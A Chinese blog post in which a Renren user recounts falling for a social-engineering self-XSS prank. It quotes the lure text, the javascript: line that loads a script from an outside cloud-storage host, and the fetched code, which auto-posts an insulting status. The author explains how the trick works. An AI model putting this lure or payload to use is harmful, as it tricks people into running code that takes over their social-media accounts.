人人网上最近很多人都中招了。
包括我这个超级潜水王。。。。
让人中招的原文如下:
尼玛啊!!校内对我的评价太让我生气了!!!看看校内对你的评价!!
人人网使用了数据挖掘技术,根据用户的行为对用户的类型进行进行了分类,比如“美女”“单身”“有思想”“文艺青年”等等。 这些东西是不允许用户看到的,不过谷歌不经意间泄漏出一段代码, 可以看到校内对你的评价: javascript:var%20s%20=%20document.createElement(‘script’); document.body.appendChild(s); s.src=’http://commondatastorage.googleapis.com /tecent/homepage’;void(0);
操作方法:
1、复制上面的代码
2、进入你的校内“首页”
3、将浏览器地址栏中的内容替换为你复制的代码
4、回车!
稍等片刻,校内会自动给你改状态,你就看到你自己的评价了。
当时也没怎么想,结果就悲剧了 !!!
单看那段JS代码,上面没有“我是2B青年”字样,应该是请求另一段JS代码,果然很巧妙呐。
再看请求的那一段代码:
var ss= document.createElement(‘script’);
ss.type=‘text/javascript’;
ss.text=“function xss(){document.getElementById(‘publisher_statusInput’).value=’我是2B青年’;
document.getElementById(‘publisher_submit’).click();return false;}”;
document.body.appendChild(ss);
ss.type=‘text/javascript’;
ss.text=“function xss(){document.getElementById(‘publisher_statusInput’).value=’我是2B青年’;
document.getElementById(‘publisher_submit’).click();return false;}”;
document.body.appendChild(ss);
//publisher_statusInput
//publisher_submit
xss();
这段代码的作用就很简单很明显了,幸亏没做其他啥特别恶劣的事情-.-,就是找到首页的状态发布栏,填入了一个“我是2B青年”的状态,然后提交发布,是个纯粹的小小恶作剧。。。
对JS不是很熟悉,感觉利用这种JS方式可以做很多有益或者坑人的事情,比如用在微博上发句啥啥啥的。
